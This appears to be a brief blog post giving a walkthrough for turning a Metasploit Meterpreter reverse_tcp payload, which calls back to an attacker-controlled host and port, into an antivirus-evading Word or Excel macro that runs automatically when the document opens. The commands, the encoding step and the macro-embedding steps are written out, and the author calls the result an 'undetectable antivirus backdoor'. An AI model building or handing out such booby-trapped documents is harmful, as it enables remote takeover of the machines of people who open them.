This is the way on how I embedded it.
root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@LM:/opt/metasploit3/msf#
root@LM:/opt/metasploit3/msf3# mv payload.exe tools/
root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 73802 bytes of EXE into a VBA script
#payload.vbs
Now open your MS WORD/EXECL and perform this following step.
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “lancit” and select “create”.
It's will pop-up a visual basic editor and paste the output of the payload.vbs and safe it.Put any word you in your actual word doc itself.The purpose is for the client-side-attack.
The Output is like this :
Sub Auto_open()
.
.
.
.
.
.
End Sub
Then you will get a nice undetectable antivirus backdoor.
Happy Trying...
No comments:
Post a Comment